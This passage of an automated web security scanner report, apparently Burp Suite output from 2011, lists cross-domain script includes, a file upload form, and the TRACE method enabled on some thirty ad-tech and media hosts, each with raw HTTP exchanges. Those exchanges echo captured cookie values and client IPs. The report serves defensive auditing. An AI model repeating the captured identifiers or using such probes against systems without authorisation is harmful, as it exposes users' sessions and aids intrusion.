Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:55 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<link href="http://grfx.cstv.com/schools/nd/library/css/nd-09-display.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://grfx.cstv.com/scripts/common.js"></script>
<script type="text/javascript" src="http://grfx.cstv.com/scripts/oas-omni-controls.js"></script>
<script type="text/javascript" src="http://grfx.cstv.com/schools/nd/library/scripts/nd-09-tabs.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="javascript" src="http://grfx.cstv.com/flash/video/flv_player.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://graphics.fansonly.com/scripts/flash-embed2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...

21.77. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/nd-m-footbl-body.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://dw.com.com/js/dw.js
http://graphics.fansonly.com/scripts/flash-embed2.js
http://graphics.fansonly.com/scripts/oas-countdown-script.js
http://grfx.cstv.com/flash/video/flv_controller.js
http://grfx.cstv.com/flash/video/flv_player.js
http://grfx.cstv.com/schools/cbs/store/08_oas_auctionsportal.js
http://grfx.cstv.com/schools/nd/library/scripts/nd-09-tabs.js
http://grfx.cstv.com/scripts/common.js
http://grfx.cstv.com/scripts/oas-omni-controls.js
http://secure-us.imrworldwide.com/v53.js
http://widgets.twimg.com/j/2/widget.js

Request

GET /sports/m-footbl/nd-m-footbl-body.html HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:40 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 83869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<link href="http://grfx.cstv.com/schools/nd/library/css/nd-09-display.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://grfx.cstv.com/scripts/common.js"></script>
<script type="text/javascript" src="http://grfx.cstv.com/scripts/oas-omni-controls.js"></script>
       <script type="text/javascript" src="http://grfx.cstv.com/schools/nd/library/scripts/nd-09-tabs.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" language="javascript" src="http://grfx.cstv.com/flash/video/flv_controller.js"></script>
...[SNIP]...
<a name="twitter"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" language="javascript" src="http://grfx.cstv.com/schools/cbs/store/08_oas_auctionsportal.js"></script>
...[SNIP]...
</script>

   <script type="text/javascript" language="javascript" src="http://grfx.cstv.com/flash/video/flv_player.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://graphics.fansonly.com/scripts/flash-embed2.js"></script>
...[SNIP]...
</script>
<script language="javascript" src="http://graphics.fansonly.com/scripts/oas-countdown-script.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...

21.78. http://www.usatoday.com/community/profile.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usatoday.com
Path:	/community/profile.htm

Issue detail

The response dynamically includes the following script from another domain:

http://cache-01.cleanprint.net/cp/ccg?divId=2625

Request

GET /community/profile.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30689
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSQSTDCBD=PLPNKDFBOKBABODIEEPNMHMM; path=/
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:32 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script
...[SNIP]...
</script>
<script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2625"></script>
...[SNIP]...
</script>
<script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2625"></script>
...[SNIP]...

21.79. http://www.usatoday.com/marketing/feedback.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usatoday.com
Path:	/marketing/feedback.htm

Issue detail

The response dynamically includes the following script from another domain:

http://cache-01.cleanprint.net/cp/ccg?divId=2625

Request

GET /marketing/feedback.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.80. http://www.usatoday.com/marketing/questions.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usatoday.com
Path:	/marketing/questions.htm

Issue detail

The response dynamically includes the following script from another domain:

http://cache-01.cleanprint.net/cp/ccg?divId=2625

Request

GET /marketing/questions.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.81. http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wisdomtree.com
Path:	/bannerads/dyneld2010fall/dyneld2010falllp.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /bannerads/dyneld2010fall/dyneld2010falllp.html HTTP/1.1
Host: www.wisdomtree.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 28427
Content-Type: text/html
Last-Modified: Mon, 28 Feb 2011 22:22:29 GMT
Accept-Ranges: bytes
ETag: "ccb960fc95d7cb1:4c1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:29:24 GMT
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.82. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wunderground.com
Path:	/auto/sacbee/CA/Sacramento.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js
http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js
http://init.lingospot.com/ls.js?key=3_Sacbee
http://media.sacbee.com/miads/yahoo.js
http://media.sacbee.com/misites/defaults.js
http://media.sacbee.com/misites/sac/sacbee.js
http://media.sacbee.com/mistats/finalizestats.js
http://media.sacbee.com/mistats/sites/sac/sacbee.js
http://media.sacbee.com/mistats/vendors/weatherunderground.js
http://media.sacbee.com/mistats/vendors/weatherunderground_s_code.js
http://media.sacbee.com/static/flash/includes/swfobject.js
http://media.sacbee.com/static/sacconnect/sacconnect-min.js
http://media.sacbee.com/static/scripts/mi/insite/insite.js
http://media.sacbee.com/static/scripts/mi/insite/insite_cookie_manager.js
http://media.sacbee.com/static/scripts/sacbee-rollup.min.js
http://media.sacbee.com/static/scripts/sectionfront-min.js
http://www.sacbee.com/1139/v-vendor_navigation/index.txt

Request

GET /auto/sacbee/CA/Sacramento.html HTTP/1.1
Host: www.wunderground.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:36 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-CreationTime: 0.271
Connection: close
Content-Type: text/html
Content-Length: 45137

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<SCRIPT LANGUAGE="JavaScript">

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
<script type="text/javascript" src="http://media.sacbee.com/static/scripts/sacbee-rollup.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://media.sacbee.com/static/scripts/mi/insite/insite_cookie_manager.js"></script>
<script type="text/javascript" src="http://media.sacbee.com/static/scripts/mi/insite/insite.js"></script>
<script type="text/javascript" src="http://media.sacbee.com/misites/defaults.js"></script>
<script type="text/javascript" src="http://media.sacbee.com/misites/sac/sacbee.js"></script>
<script type="text/javascript" src="http://media.sacbee.com/miads/yahoo.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://media.sacbee.com/static/scripts/sectionfront-min.js"></script>
<script type="text/javascript" src="http://www.sacbee.com/1139/v-vendor_navigation/index.txt"></script>
...[SNIP]...

<script type="text/javascript" src="http://media.sacbee.com/static/flash/includes/swfobject.js"></script>
...[SNIP]...
</script>
<script language="javascript" src="http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://media.sacbee.com/mistats/sites/sac/sacbee.js"></script>
<script type="text/javascript" src="http://media.sacbee.com/mistats/vendors/weatherunderground_s_code.js"></script>
<script type="text/javascript" src="http://media.sacbee.com/mistats/vendors/weatherunderground.js"></script>
<script type="text/javascript" src="http://media.sacbee.com/mistats/finalizestats.js"></script>
...[SNIP]...
<div id="MI_post_load" style="display:none;">
<script type="text/javascript" src="http://init.lingospot.com/ls.js?key=3_Sacbee"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://media.sacbee.com/static/sacconnect/sacconnect-min.js"></script>
...[SNIP]...

21.83. http://www.youtube.com/results previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/results

Issue detail

The response dynamically includes the following script from another domain:

http://s.ytimg.com/yt/jsbin/www-core-vflatRxZ9.js

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22. File upload functionality previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.google.com
Path:	/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://translate.google.com/

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

File path traversal
Persistent cross-site scripting
Placing of other client-executable code into the domain
Transmission of viruses and other malware
Denial of service

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Whether uploaded content can subsequently be downloaded via a URL within the application.
What Content-type and Content-disposition headers the application returns when the file's content is downloaded.
Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed.
Whether the application performs any filtering on the file extension or MIME type of the uploaded file.
Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file).
What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location.
Whether archive formats such as ZIP are unpacked by the application.
How the application handles attempts to upload very large files, or decompression bomb files.

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Use a server-generated filename if storing uploaded files on disk.
Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
Enforce a whitelist of accepted, non-executable file extensions.
If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment.
Enforce a size limit on uploaded files (for defence-in-depth, this can be implemented both within application code and in the web server's configuration.
Reject attempts to upload archive formats such as ZIP.

Request

GET / HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:24:38 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en
X-Content-Type-Options: nosniff
Server: HTTP server (unknown)
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><input type=file name=file id=file size=40></div>
...[SNIP]...

23. TRACE method is enabled previous next
There are 30 instances of this issue:

http://anrtx.tacoda.net/
http://bh.contextweb.com/
http://blogs.reuters.com/
http://clk.fetchback.com/
http://digg.com/
http://dw.com.com/
http://image2.pubmatic.com/
http://imp.fetchback.com/
http://legolas.nexac.com/
http://log.c12s.com/
http://matcher-rbc.bidder7.mookie1.com/
https://observ.subscribeobserver.com/
http://optimized-by.rubiconproject.com/
http://outbrain.com/
http://picasaweb.google.com/
http://pixel.rubiconproject.com/
http://r.openx.net/
http://rt.legolas-media.com/
http://sacramentoconnect.sacbee.com/
http://search.spotxchange.com/
http://shop.sprint.com/
http://tacoda.at.atwola.com/
http://tap.rubiconproject.com/
http://www.greenbiz.com/
http://www.idg.com/
http://www.newslibrary.com/
http://www.outbrain.com/
http://www.sprint.com/
https://www.sprint.net/
http://www.stumbleupon.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

23.1. http://anrtx.tacoda.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://anrtx.tacoda.net
Path:	/

Request

TRACE / HTTP/1.0
Host: anrtx.tacoda.net
Cookie: b953810fa4a140cd

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:39 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: b953810fa4a140cd; mig=3
Host: anrtx.tacoda.net
X-Forwarded-For: 50.23.123.106
X-LB-Client-IP: 50.23.123.106

23.2. http://bh.contextweb.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/

Request

TRACE / HTTP/1.0
Host: bh.contextweb.com
Cookie: 6348ffae4ee27608

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
Content-Type: message/http
Content-Length: 144
Date: Sun, 04 Sep 2011 01:21:59 GMT
Connection: Keep-Alive

TRACE / HTTP/1.0
host: bh.contextweb.com
cookie: 6348ffae4ee27608; V=LZLz3N9wRgPO
connection: Keep-Alive
cw-userhostaddress: 50.23.123.106

23.3. http://blogs.reuters.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.reuters.com
Path:	/

Request

TRACE / HTTP/1.0
Host: blogs.reuters.com
Cookie: e6a5e5c3ad2b177d

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:01 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: blogs.reuters.com
Cookie: e6a5e5c3ad2b177d; tns=dataSource=cookie; __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26dat
...[SNIP]...

23.4. http://clk.fetchback.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.fetchback.com
Path:	/

Request

TRACE / HTTP/1.0
Host: clk.fetchback.com
Cookie: e2083fc1e36da1ba

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:17 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: clk.fetchback.com
Cookie: e2083fc1e36da1ba; cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; eng=1_1315097185_75:0; kwd=1_1315097271; scg=1_1315097271; ppd=1_1315097271; act=1_131509727
...[SNIP]...

23.5. http://digg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/

Request

TRACE / HTTP/1.0
Host: digg.com
Cookie: 8777dc2444bf646e

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:25 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: digg.com
Cookie: 8777dc2444bf646e; traffic_control=700100000060910000168986600170000020084302a10001%3A300%3A112; d=7094aaf3694d1678ad15ca811571c1c6f5a068e00748f4e2dfe3d74d143d0c67
Connection: Keep-Alive
X-forwarded-for: 50.23.123.10
...[SNIP]...

23.6. http://dw.com.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dw.com.com
Path:	/

Request

TRACE / HTTP/1.0
Host: dw.com.com
Cookie: 7fb5e64c4155cd55

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:51 GMT
Server: Apache/2.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: dw.com.com
Cookie: 7fb5e64c4155cd55; XCLGFbrowser=Cg8IL05erE98AAAAVzE
Connection: Keep-Alive
X-CNET-Forwarded-For: 50.23.123.106

23.7. http://image2.pubmatic.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/

Request

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: cddb35622971706e

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:39 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: cddb35622971706e

23.8. http://imp.fetchback.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/

Request

TRACE / HTTP/1.0
Host: imp.fetchback.com
Cookie: 794570e196ec6341

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:18 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: imp.fetchback.com
Cookie: 794570e196ec6341; cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601;
...[SNIP]...

23.9. http://legolas.nexac.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://legolas.nexac.com
Path:	/

Request

TRACE / HTTP/1.0
Host: legolas.nexac.com
Cookie: aee0ca98edb525da

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:40 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: legolas.nexac.com
Cookie: aee0ca98edb525da; lgtix=SQACADMB; na_tc=Y
X-Forwarded-For: 50.23.123.106

23.10. http://log.c12s.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://log.c12s.com
Path:	/

Request

TRACE / HTTP/1.0
Host: log.c12s.com
Cookie: cbcf73c28640cfb8

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Sun, 04 Sep 2011 00:45:33 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 204
Connection: Close

TRACE / HTTP/1.1
host: log.c12s.com
Cookie: cbcf73c28640cfb8; aid=10.87.42.144.1315097001140001
X-Forwarded-For: 50.23.123.106
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive

23.11. http://matcher-rbc.bidder7.mookie1.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://matcher-rbc.bidder7.mookie1.com
Path:	/

Request

TRACE / HTTP/1.0
Host: matcher-rbc.bidder7.mookie1.com
Cookie: 6bbbfb80151da51e

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:52 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher-rbc.bidder7.mookie1.com
Cookie: 6bbbfb80151da51e; OAX=Mhd7ak5iycEADA/r; id=4612108236187221462; mdata=1|4612108236187221462|1315097275; RMFD=011R00uaO10XsU
Connection: Keep-Alive
MIG_IP: 50.23.123.106

23.12. https://observ.subscribeobserver.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://observ.subscribeobserver.com
Path:	/

Request

TRACE / HTTP/1.0
Host: observ.subscribeobserver.com
Cookie: 29d6e24b5579f225

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:42 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: observ.subscribeobserver.com
Cookie: 29d6e24b5579f225

23.13. http://optimized-by.rubiconproject.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/

Request

TRACE / HTTP/1.0
Host: optimized-by.rubiconproject.com
Cookie: 5aa31465ca673638

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:00 GMT
Server: RAS/1.3 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 5aa31465ca673638; put_1994=vf1kj11kp2en; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHO
...[SNIP]...

23.14. http://outbrain.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://outbrain.com
Path:	/

Request

TRACE / HTTP/1.0
Host: outbrain.com
Cookie: 125bc7c506c7eb3c

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:10 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: outbrain.com
Cookie: 125bc7c506c7eb3c; obuid=7a957d2b-640c-464a-8acd-8219f3607c99; _lvs2="RifDljbBnUo="; _lvd2="a20VgmTZEaeQlaVAQ/tI3Q=="; _rcc2="/RlY4kI4x+EC5hF25OSb5Q=="; recs-854b02c66246fc93dfc645a82c80a4b1="bVAbJr8tUVORIisX5Qp35qGt39
...[SNIP]...

23.15. http://picasaweb.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://picasaweb.google.com
Path:	/

Request

TRACE / HTTP/1.0
Host: picasaweb.google.com
Cookie: 815cb55458c58e3b

Response

HTTP/1.0 200 OK
Expires: Sun, 04 Sep 2011 01:23:13 GMT
Date: Sun, 04 Sep 2011 01:23:13 GMT
Cache-Control: private, max-age=0, must-revalidate
Content-Type: message/http; charset=UTF-8
Content-Length: 1025
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

TRACE /errors/405 HTTP/1.1
Host: picasaweb.google.com
Cookie: 815cb55458c58e3b; _rtok=oJqosnvceopT; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f
...[SNIP]...

23.16. http://pixel.rubiconproject.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/

Request

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 97a7bf19d725e086

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:02:09 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 97a7bf19d725e086; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C1%2C2%2C%2C; put_1994=vf1kj11kp2en; put_2046=WX9qald2TXhCBmNbCwp
...[SNIP]...

23.17. http://r.openx.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/

Request

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 243ddda595f6b1b5

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:26 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 243ddda595f6b1b5; i=4e28a2c0-3fbe-4680-b440-7249a1d4d410
X-Forwarded-For: 50.23.123.106

23.18. http://rt.legolas-media.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rt.legolas-media.com
Path:	/

Request

TRACE / HTTP/1.0
Host: rt.legolas-media.com
Cookie: c4243ca34d826fa

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:42 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: rt.legolas-media.com
Cookie: c4243ca34d826fa; ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgpr=//8=; lgdv12=1; lgdv6=1; lgdv95=1; lgdv73=1; lgtix=BgABADMBSQABADMBHAACADMBDAABADMB/QABADABXwABADMB

23.19. http://sacramentoconnect.sacbee.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sacramentoconnect.sacbee.com
Path:	/

Request

TRACE / HTTP/1.0
Host: sacramentoconnect.sacbee.com
Cookie: 5aa5174ee7e6e059

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:34 GMT
Server: Apache/2.2.16 (Amazon)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sacramentoconnect.sacbee.com
Cookie: 5aa5174ee7e6e059; disqus_reset=Sun%2C%2004%20Sep%202011%2000%3A44%3A40%20GMT; __g_c=c%3A258447044937878%7Cd%3A1%7Ca%3A0%7Cb%3A2%7Ce%3A0.01%7Cf%3A1%7Ch%3A1; __g_u=258447044937878_1_0.01_1_5_1315529080804_1; vmix_core_u
...[SNIP]...

23.20. http://search.spotxchange.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.spotxchange.com
Path:	/

Request

TRACE / HTTP/1.0
Host: search.spotxchange.com
Cookie: f8dfd632d533e9de

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:45 GMT
Server: Apache
Connection: close
Content-Type: message/http

